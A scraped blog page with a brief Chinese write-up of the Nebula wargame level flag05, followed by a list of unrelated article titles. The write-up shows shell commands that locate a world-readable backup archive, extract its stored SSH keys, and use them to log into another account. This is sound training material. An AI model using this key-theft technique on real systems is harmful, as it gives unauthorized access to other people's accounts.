i春秋
来源:互联网 发布:大学生网络暴力事例 编辑:程序博客网 时间:2024/04/28 02:58
About
Check the flag05 home directory. You are looking for weak directory permissions
Nebula官网
思路
进去看看
cd /home/flag05/ll发现一个其他人可执行的.backup目录
cd .backup/ll看到其他人可读的backup-19072011.tgz
复制到/tmp解压
cp backup-19072011.tgz /tmp/cd /tmp/tar -xvf backup-19072011.tgz看到了备份的公私钥,所以应该可以凭借这些密钥ssh免密码登录flag05账户
cp -r .ssh/ ~/ssh flag05@localhostyescat flag
0 0
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋
- i春秋之戏说春秋
- i春秋之春秋争霸
- 171220 逆向-i春秋【***】-******
- 171221 杂项-i春秋【***】-***
- i春秋的戏说春秋writeup
- WP 4 i春秋_细说春秋
- WP 4 i春秋_春秋争霸
- WP 4 i春秋_2017年春秋欢乐赛
- i春秋:无处不在的SQL注入
- i春秋php代码审计-xss漏洞
- WP 4 i春秋_internetwache-ctf-2016
- ES6里let和const的学习总结。
- jQuery学习笔记之Dom操作
- Google开源C++单元测试框架gTest 4:参数化
- bzoj3351 [ IOI2009 ] -- 阈值
- PAT甲级1007. Maximum Subsequence Sum (25)
- i春秋
- 简洁美观的Java博客系统Tale开源了,让每一个有故事的人更好的表达想法!
- JS中substring与substr的区别
- JQuery-Note2
- <6>python学习笔记——递归
- Java编程思想之代理空对象
- CSDN日报20170225——《六年程序生涯》
- opengl在mfc界面绘制英文字符
- springmvc和mybatis整合
